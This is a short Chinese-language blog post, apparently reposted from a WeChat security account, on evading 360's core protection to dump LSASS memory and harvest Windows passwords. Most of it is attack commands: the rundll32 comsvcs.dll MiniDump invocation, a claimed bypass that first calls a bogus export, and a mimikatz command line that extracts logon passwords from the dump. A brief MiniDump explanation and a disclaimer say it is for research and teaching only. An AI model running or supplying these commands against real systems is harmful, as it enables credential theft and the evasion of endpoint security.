rundll32.exe C:windowsSystem32comsvcs.dll,MiniDump <进程ID> <保存路径> full现在想直接利用这个命令dump lsass比较困难。应该大部分师傅现在已经放弃了这条命令了。因为可以替代的确实屈指可数。
MiniDump介绍
Windows操作系统提供的一种API,用于生成程序的崩溃转储文件。当程序发生崩溃时,MiniDump API可以用于创建一个包含程序内存、寄存器状态、堆栈跟踪等信息的转储文件。这个转储文件可以帮助开发人员分析程序崩溃的原因,以便进行故障排除和修复。
通过了解MiniDump这个Api,可以发现mimikatz的工作原理其实也是围绕MiniDump进行展开的!!!
绕过方式
先执行:
rundll32.exe C:windowsSystem32comsvcs.dll,Fuck_Hacker
后执行:
rundll32.exe C:windowsSystem32comsvcs.dll,MiniDump <进程ID> <保存路径> full
mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
因为我自己的虚拟机没有设置密码,所以......
原文始发于微信公众号(零攻防):零基础绕过360核晶dump lsass,变向抓密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论